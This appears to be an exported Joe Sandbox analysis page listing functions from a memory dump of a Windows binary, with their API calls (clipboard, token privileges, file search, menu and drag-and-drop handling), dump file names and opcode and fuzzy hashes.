                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • OpenClipboard.USER32(00B2DBF0), ref: 00AE70C3
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AE70D1
                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00AE70D9
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE70E5
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AE7101
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE710B
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AE7120
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00AE712D
                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00AE7135
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AE7142
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AE7176
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE7283
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                                        • Opcode ID: 3dc777ad223fce69a6b80a71e516fb27e0bcd2298c97ec9825224931822083b4
                                                                                                                                                        • Instruction ID: aa91d5ae53409cdc6c0b3f521751c0e372170369b8f95bb4c41029444cb1b083
                                                                                                                                                        • Opcode Fuzzy Hash: 3dc777ad223fce69a6b80a71e516fb27e0bcd2298c97ec9825224931822083b4
                                                                                                                                                        • Instruction Fuzzy Hash: 4351C031308341ABD711EB65DD9AFAE77E8AF84B01F808619F646D72E1DF70D9048B62
                                                                                                                                                        Function 00ACB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                                                                                                                                                          • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                                                                                                                                                          • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                                                                                                                                                        • _memset.LIBCMT ref: 00ACBA34
                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ACBA86
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00ACBA97
                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ACBAAE
                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00ACBAC7
                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00ACBAD1
                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ACBAEB
                                                                                                                                                          • Part of subcall function 00ACB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00ACB8C5
                                                                                                                                                          • Part of subcall function 00ACB8B0: CloseHandle.KERNEL32(?), ref: 00ACB8D7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                                        • Opcode ID: b787730c27dc3aa97db2edd76f3ad3df8fcdaf514a02324fe16ec4109c86e7a4
                                                                                                                                                        • Instruction ID: abb6183ecf8f46fc221a0bd135178e23c83986eb2e00540522eb9238213b2a08
                                                                                                                                                        • Opcode Fuzzy Hash: b787730c27dc3aa97db2edd76f3ad3df8fcdaf514a02324fe16ec4109c86e7a4
                                                                                                                                                        • Instruction Fuzzy Hash: 9D815771910208AFDF11DFA4CD46EEEBBB8EF08304F158559F915A62A1DB328E14EB21
                                                                                                                                                        Function 00AE2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00AE2065
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE207A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2091
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00AE20A3
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00AE20BD
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00AE20D5
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE20E0
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE20FC
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2123
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE213A
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE214C
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE216A
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE2174
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2181
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2191
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                                                        • Opcode ID: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                                                                                                                                                        • Instruction ID: 5745a4249fadd4a0d13c7b0e7139a50c3f98ffa3c15d6aaec052ff712462006d
                                                                                                                                                        • Opcode Fuzzy Hash: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                                                                                                                                                        • Instruction Fuzzy Hash: 0A31AE329402597ACB14ABA5EC49FDE73EC9F09320F1441A6EA15E30A0EB74DF84CB65
                                                                                                                                                        Function 00AFF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00AFF14B
                                                                                                                                                          • Part of subcall function 00AFD5EE: ClientToScreen.USER32(?,?), ref: 00AFD617
                                                                                                                                                          • Part of subcall function 00AFD5EE: GetWindowRect.USER32(?,?), ref: 00AFD68D
                                                                                                                                                          • Part of subcall function 00AFD5EE: PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF1B4
                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AFF1BF
                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AFF1E2
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AFF212
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AFF229
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF242
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF259
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF27B
                                                                                                                                                        • DragFinish.SHELL32(?), ref: 00AFF282
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00AFF36D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                        • API String ID: 2166380349-3440237614
                                                                                                                                                        • Opcode ID: 181456ba234fdc0e78632a323b548e7cc9183bddc16381477c40231732b6eb87
                                                                                                                                                        • Instruction ID: d78bf51c9399d6ef3c4be4a4bf73ae04dcdacf362162abf56d21f7785af990d7
                                                                                                                                                        • Opcode Fuzzy Hash: 181456ba234fdc0e78632a323b548e7cc9183bddc16381477c40231732b6eb87
                                                                                                                                                        • Instruction Fuzzy Hash: D9616772508304AFC700EF64DD85EABBBF8FF89750F404A19F695971A1DB709A05CB52
                                                                                                                                                        Function 00AE219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00AE21C0
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE21D5
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE21EC
                                                                                                                                                          • Part of subcall function 00AD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AD7621
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00AE221B
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2226
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE2242
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2269
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2280
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE2292
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE22B0
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE22BA
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE22C7
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE22D7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                                                        • Opcode ID: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                                                                                                                                                        • Instruction ID: c7285e6a14b7abf97427890d28f3d64eba094e379254f25baf71c582e673bf88
                                                                                                                                                        • Opcode Fuzzy Hash: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                                                                                                                                                        • Instruction Fuzzy Hash: 1D31D2329412597ACF14EBA5EC49FDE77AC9F45320F144191EA14E30A0EB70DF85CB69
                                                                                                                                                        Function 00A96BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove_memset
                                                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                                                        • Opcode ID: 8a82f8b554a15d4b9df624ee544f82117d395fe88a5634e8ad71004d621840c1
                                                                                                                                                        • Instruction ID: 88c73111549513fce939439f41c4932c0316cfd881ef2dc0416e20eb4d3d9996
                                                                                                                                                        • Opcode Fuzzy Hash: 8a82f8b554a15d4b9df624ee544f82117d395fe88a5634e8ad71004d621840c1
                                                                                                                                                        • Instruction Fuzzy Hash: E472AC71E14219DBDF28CF98C9806EDB7F1FF48314F2481A9D855AB281E774AE81DB90
                                                                                                                                                        Function 00AFECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AFED0C
                                                                                                                                                        • GetFocus.USER32 ref: 00AFED1C
                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00AFED27
                                                                                                                                                        • _memset.LIBCMT ref: 00AFEE52
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00AFEE7D
                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00AFEE9D
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AFEEB0
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00AFEEE4
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00AFEF2C
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AFEF64
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00AFEF99
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 3616455698-4108050209
                                                                                                                                                        • Opcode ID: 3fa72e8ca0aa56a09eb0058557026b8485c77d88c687c39530f4047c9a942f43
                                                                                                                                                        • Instruction ID: 0cd1c3b9a94ba6af080aeabe5447e04691a8265cbcf656c6031383d291f86816
                                                                                                                                                        • Opcode Fuzzy Hash: 3fa72e8ca0aa56a09eb0058557026b8485c77d88c687c39530f4047c9a942f43
                                                                                                                                                        • Instruction Fuzzy Hash: E0817E71208309AFD720DF54D884ABBBBE9FB88754F00496DFA95972A1D730DD05CB62
                                                                                                                                                        Function 00ACB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                          • Part of subcall function 00ACB8E7: RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                          • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                                                                                                                                                          • Part of subcall function 00ACB982: RtlAllocateHeap.NTDLL(00000000,?,00ACB3E1), ref: 00ACB995
                                                                                                                                                          • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB3FC
                                                                                                                                                        • _memset.LIBCMT ref: 00ACB411
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB430
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB441
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB47E
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB49A
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB4B7
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB4C6
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ACB4CD
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB4EE
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00ACB4F5
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB526
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB54C
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB560
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                                        • Opcode ID: 1f7393b58b3fde18665568c4ab4a94e39dfcd39d25429a15f680a773fcea0e4c
                                                                                                                                                        • Instruction ID: edc7c5d35c98157531a4db0f8736b7111a8211bf1cc9b3f712cd3982697eba45
                                                                                                                                                        • Opcode Fuzzy Hash: 1f7393b58b3fde18665568c4ab4a94e39dfcd39d25429a15f680a773fcea0e4c
                                                                                                                                                        • Instruction Fuzzy Hash: 03513A75910209ABDF04DFA5DC5AEEEBB79FF08300F05812DE916A7291DB369A05CB60
                                                                                                                                                        Function 00AD6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                        Download Yara Rule
